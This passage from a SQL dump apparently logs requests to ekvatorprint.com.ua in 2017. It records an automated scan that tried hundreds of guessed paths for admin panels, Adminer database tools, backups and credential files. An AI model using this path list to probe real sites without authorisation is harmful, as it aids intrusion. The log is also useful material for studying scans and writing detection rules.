13:27:34','0000-00-00 00:00:00',301),(5469,'http://ekvatorprint.com.ua/admincp.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5470,'http://ekvatorprint.com.ua/admincp',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5471,'http://ekvatorprint.com.ua/admincp/',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5472,'http://ekvatorprint.com.ua/admincp/index.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5473,'http://ekvatorprint.com.ua/admincp/index.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5474,'http://ekvatorprint.com.ua/admincp/index.html',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5475,'http://ekvatorprint.com.ua/admincp/js/kindeditor/',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5476,'http://ekvatorprint.com.ua/admincp/login.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5477,'http://ekvatorprint.com.ua/admincp/login.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5478,'http://ekvatorprint.com.ua/admincp/upload/',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5479,'http://ekvatorprint.com.ua/admincpanel',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5480,'http://ekvatorprint.com.ua/admincrud',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5481,'http://ekvatorprint.com.ua/admincurrency.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5482,'http://ekvatorprint.com.ua/admincurrency.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5483,'http://ekvatorprint.com.ua/admindav.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5484,'http://ekvatorprint.com.ua/admincp.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5485,'http://ekvatorprint.com.ua/admindav.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5486,'http://ekvatorprint.com.ua/admindb',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5487,'http://ekvatorprint.com.ua/admindemo',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5488,'http://ekvatorprint.com.ua/admine',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5489,'http://ekvatorprint.com.ua/adminemails.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5490,'http://ekvatorprint.com.ua/adminemails.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5491,'http://ekvatorprint.com.ua/adminer-3.4.0-en.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5492,'http://ekvatorprint.com.ua/adminer-3.4.0-mysql.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5493,'http://ekvatorprint.com.ua/adminer-3.4.0-en.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5494,'http://ekvatorprint.com.ua/adminer-3.4.0-mysql.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5495,'http://ekvatorprint.com.ua/adminer-4.0.3.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5496,'http://ekvatorprint.com.ua/adminer-3.4.0.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5497,'http://ekvatorprint.com.ua/adminer-3.4.0.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5498,'http://ekvatorprint.com.ua/adminer-4.0.3-mysql.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5499,'http://ekvatorprint.com.ua/adminer-4.2.0-mysql.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5500,'http://ekvatorprint.com.ua/adminer-4.1.0-mysql.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5501,'http://ekvatorprint.com.ua/adminer-4.1.0.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5502,'http://ekvatorprint.com.ua/adminer-4.2.0.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5503,'http://ekvatorprint.com.ua/adminer.php',NULL,'','',3,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5504,'http://ekvatorprint.com.ua/adminer/',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5505,'http://ekvatorprint.com.ua/adminexec.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5506,'http://ekvatorprint.com.ua/adminer/adminer.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5507,'http://ekvatorprint.com.ua/adminfeedback',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5508,'http://ekvatorprint.com.ua/adminexec.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5509,'http://ekvatorprint.com.ua/adminfeedback.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5510,'http://ekvatorprint.com.ua/adminfiles',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5511,'http://ekvatorprint.com.ua/adminfeedback.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5512,'http://ekvatorprint.com.ua/adminfolder',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5513,'http://ekvatorprint.com.ua/adminforce',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5514,'http://ekvatorprint.com.ua/adminforms',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5515,'http://ekvatorprint.com.ua/adminftp',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5516,'http://ekvatorprint.com.ua/adminforum',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5517,'http://ekvatorprint.com.ua/adminfunction.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5518,'http://ekvatorprint.com.ua/adminfunction.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5519,'http://ekvatorprint.com.ua/adminfunctions.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5520,'http://ekvatorprint.com.ua/admingames',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5521,'http://ekvatorprint.com.ua/adminfunctions.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5522,'http://ekvatorprint.com.ua/admingen',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5523,'http://ekvatorprint.com.ua/admingh',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5524,'http://ekvatorprint.com.ua/adminguide',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5525,'http://ekvatorprint.com.ua/adminhome',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5526,'http://ekvatorprint.com.ua/adminhome.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5527,'http://ekvatorprint.com.ua/adminhome.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5528,'http://ekvatorprint.com.ua/adminhtml',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5529,'http://ekvatorprint.com.ua/admini',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5530,'http://ekvatorprint.com.ua/adminibator',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5531,'http://ekvatorprint.com.ua/adminindex.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5532,'http://ekvatorprint.com.ua/adminindex.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5533,'http://ekvatorprint.com.ua/admininistration',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5534,'http://ekvatorprint.com.ua/admininitems.php',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5535,'http://ekvatorprint.com.ua/admininitems.',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5536,'http://ekvatorprint.com.ua/adminis',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5537,'http://ekvatorprint.com.ua/adminisrator',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5538,'http://ekvatorprint.com.ua/admininterface',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5539,'http://ekvatorprint.com.ua/administ',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5540,'http://ekvatorprint.com.ua/administation',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5541,'http://ekvatorprint.com.ua/administracao',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5542,'http://ekvatorprint.com.ua/administer',NULL,'','',1,0,'2017-01-20 13:27:35','0000-00-00 00:00:00',301),(5543,'http://ekvatorprint.com.ua/administracao.',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5544,'http://ekvatorprint.com.ua/administator',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5545,'http://ekvatorprint.com.ua/administra',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5546,'http://ekvatorprint.com.ua/administracija',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5547,'http://ekvatorprint.com.ua/administracao.php',NULL,'','',2,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5548,'http://ekvatorprint.com.ua/administracion',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5549,'http://ekvatorprint.com.ua/administracio',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5550,'http://ekvatorprint.com.ua/administrace',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5551,'http://ekvatorprint.com.ua/administracion.',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5552,'http://ekvatorprint.com.ua/administracion.php',NULL,'','',2,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5553,'http://ekvatorprint.com.ua/administracja',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5554,'http://ekvatorprint.com.ua/administrador',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5555,'http://ekvatorprint.com.ua/administracion/',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5556,'http://ekvatorprint.com.ua/administraotr',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5557,'http://ekvatorprint.com.ua/administrar',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5558,'http://ekvatorprint.com.ua/administrare',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5559,'http://ekvatorprint.com.ua/administrasjon',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5560,'http://ekvatorprint.com.ua/administrate',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5561,'http://ekvatorprint.com.ua/administrateur',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5562,'http://ekvatorprint.com.ua/administrateur.php',NULL,'','',2,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5563,'http://ekvatorprint.com.ua/administrateur.',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5564,'http://ekvatorprint.com.ua/administration',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5565,'http://ekvatorprint.com.ua/administration.',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5566,'http://ekvatorprint.com.ua/administration.html',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5567,'http://ekvatorprint.com.ua/administratie',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5568,'http://ekvatorprint.com.ua/administration.php',NULL,'','',2,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5569,'http://ekvatorprint.com.ua/administration/Sym.php',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5570,'http://ekvatorprint.com.ua/administration.shtml',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5571,'http://ekvatorprint.com.ua/administration/',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5572,'http://ekvatorprint.com.ua/administrative',NULL,'','',1,0,'2017-01-20 13:27:36','0000-00-00 00:00:00',301),(5573,'http://ekvatorprint.com.ua/administrative/login_history',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5574,'http://ekvatorprint.com.ua/administrative/',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5575,'http://ekvatorprint.com.ua/administrativo',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5576,'http://ekvatorprint.com.ua/administrator.',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5577,'http://ekvatorprint.com.ua/administrator.htm',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5578,'http://ekvatorprint.com.ua/administrator.html',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5579,'http://ekvatorprint.com.ua/administrator.jsp',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5580,'http://ekvatorprint.com.ua/administrator.py',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5581,'http://ekvatorprint.com.ua/administrator.shtml',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5582,'http://ekvatorprint.com.ua/administrator.rb',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5583,'http://ekvatorprint.com.ua/administrator/account.php',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5584,'http://ekvatorprint.com.ua/administrator/account.',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5585,'http://ekvatorprint.com.ua/administrator/account.html',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5586,'http://ekvatorprint.com.ua/administrator/index.',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5587,'http://ekvatorprint.com.ua/administrator/login.',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5588,'http://ekvatorprint.com.ua/administrator/index.html',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5589,'http://ekvatorprint.com.ua/administrator/login',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5590,'http://ekvatorprint.com.ua/administrator/login.html',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5591,'http://ekvatorprint.com.ua/administrator2',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5592,'http://ekvatorprint.com.ua/administrator/logs',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5593,'http://ekvatorprint.com.ua/administrators',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5594,'http://ekvatorprint.com.ua/administratorlogin/',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5595,'http://ekvatorprint.com.ua/administrer',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5596,'http://ekvatorprint.com.ua/administrators.pwd',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5597,'http://ekvatorprint.com.ua/administratsiya',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5598,'http://ekvatorprint.com.ua/administrivia',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5599,'http://ekvatorprint.com.ua/admink',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5600,'http://ekvatorprint.com.ua/adminjsp',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5601,'http://ekvatorprint.com.ua/adminka',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5602,'http://ekvatorprint.com.ua/adminka.php',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5603,'http://ekvatorprint.com.ua/adminko',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5604,'http://ekvatorprint.com.ua/adminka.',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5605,'http://ekvatorprint.com.ua/adminl.php',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5606,'http://ekvatorprint.com.ua/adminlinks',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5607,'http://ekvatorprint.com.ua/adminlevel',NULL,'','',1,0,'2017-01-20 13:27:37','0000-00-00 00:00:00',301),(5608,'http://ekvatorprint.com.ua/adminl.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5609,'http://ekvatorprint.com.ua/adminlinks.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5610,'http://ekvatorprint.com.ua/adminlinks.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5611,'http://ekvatorprint.com.ua/adminlist.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5612,'http://ekvatorprint.com.ua/adminlist.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5613,'http://ekvatorprint.com.ua/adminlistings.x',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5614,'http://ekvatorprint.com.ua/adminlocales.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5615,'http://ekvatorprint.com.ua/adminlocales.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5616,'http://ekvatorprint.com.ua/adminlogin',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5617,'http://ekvatorprint.com.ua/adminlogin.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5618,'http://ekvatorprint.com.ua/adminlogin.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5619,'http://ekvatorprint.com.ua/adminlogin/',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5620,'http://ekvatorprint.com.ua/adminlogon',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5621,'http://ekvatorprint.com.ua/adminlogon.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5622,'http://ekvatorprint.com.ua/adminlogon.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5623,'http://ekvatorprint.com.ua/adminm',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5624,'http://ekvatorprint.com.ua/adminlogon/',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5625,'http://ekvatorprint.com.ua/adminm.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5626,'http://ekvatorprint.com.ua/adminm.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5627,'http://ekvatorprint.com.ua/adminmanager',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5628,'http://ekvatorprint.com.ua/adminmassmail.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5629,'http://ekvatorprint.com.ua/adminmassmail.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5630,'http://ekvatorprint.com.ua/adminmaster',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5631,'http://ekvatorprint.com.ua/adminmember/',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5632,'http://ekvatorprint.com.ua/adminmenu',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5633,'http://ekvatorprint.com.ua/adminmodule',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5634,'http://ekvatorprint.com.ua/adminn',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5635,'http://ekvatorprint.com.ua/adminnav.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5636,'http://ekvatorprint.com.ua/adminnav.php',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5637,'http://ekvatorprint.com.ua/adminnet',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5638,'http://ekvatorprint.com.ua/adminnew',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5639,'http://ekvatorprint.com.ua/adminnews',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5640,'http://ekvatorprint.com.ua/adminok',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5641,'http://ekvatorprint.com.ua/admino',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5642,'http://ekvatorprint.com.ua/adminnorthface',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5643,'http://ekvatorprint.com.ua/adminonline',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5644,'http://ekvatorprint.com.ua/adminold',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5645,'http://ekvatorprint.com.ua/adminonly',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5646,'http://ekvatorprint.com.ua/adminopanel',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5647,'http://ekvatorprint.com.ua/adminp',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5648,'http://ekvatorprint.com.ua/adminpage',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5649,'http://ekvatorprint.com.ua/adminpages',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5650,'http://ekvatorprint.com.ua/adminpanel',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5651,'http://ekvatorprint.com.ua/adminpanel.php',NULL,'','',2,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5652,'http://ekvatorprint.com.ua/adminpanel.',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5653,'http://ekvatorprint.com.ua/adminpanel.html',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5654,'http://ekvatorprint.com.ua/adminpanel/',NULL,'','',1,0,'2017-01-20 13:27:38','0000-00-00 00:00:00',301),(5655,'http://ekvatorprint.com.ua/adminpool',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5656,'http://ekvatorprint.com.ua/adminpp',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5657,'http://ekvatorprint.com.ua/adminprefs.',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5658,'http://ekvatorprint.com.ua/adminprefs.php',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5659,'http://ekvatorprint.com.ua/adminpro',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5660,'http://ekvatorprint.com.ua/adminradii',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5661,'http://ekvatorprint.com.ua/adminresources',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5662,'http://ekvatorprint.com.ua/adminreports',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5663,'http://ekvatorprint.com.ua/adminroot',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5664,'http://ekvatorprint.com.ua/adminq',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5665,'http://ekvatorprint.com.ua/admins.php',NULL,'','',2,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5666,'http://ekvatorprint.com.ua/admins',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5667,'http://ekvatorprint.com.ua/admins.',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5668,'http://ekvatorprint.com.ua/admins.asp',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5669,'http://ekvatorprint.com.ua/admins/',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5670,'http://ekvatorprint.com.ua/admins/log.txt',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5671,'http://ekvatorprint.com.ua/admins/backup/',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5672,'http://ekvatorprint.com.ua/adminsFUCKYOU.',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5673,'http://ekvatorprint.com.ua/adminsales',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5674,'http://ekvatorprint.com.ua/adminscripts',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5675,'http://ekvatorprint.com.ua/adminsFUCKYOU.php',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5676,'http://ekvatorprint.com.ua/adminserver',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5677,'http://ekvatorprint.com.ua/adminshop',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5678,'http://ekvatorprint.com.ua/adminstore',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5679,'http://ekvatorprint.com.ua/adminshout',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5680,'http://ekvatorprint.com.ua/adminstaff',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5681,'http://ekvatorprint.com.ua/adminsite',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5682,'http://ekvatorprint.com.ua/adminstration',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5683,'http://ekvatorprint.com.ua/adminsql',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5684,'http://ekvatorprint.com.ua/adminstuff',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5685,'http://ekvatorprint.com.ua/adminsys',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5686,'http://ekvatorprint.com.ua/adminsystem',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5687,'http://ekvatorprint.com.ua/adminsystems',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5688,'http://ekvatorprint.com.ua/admint',NULL,'','',1,0,'2017-01-20 13:27:39','0000-00-00 00:00:00',301),(5689,'http://ekvatorprint.com.ua/adminth',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5690,'http://ekvatorprint.com.ua/admintable.',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5691,'http://ekvatorprint.com.ua/admintable.php',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5692,'http://ekvatorprint.com.ua/admintool',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5693,'http://ekvatorprint.com.ua/admintemplates',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5694,'http://ekvatorprint.com.ua/admintest',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 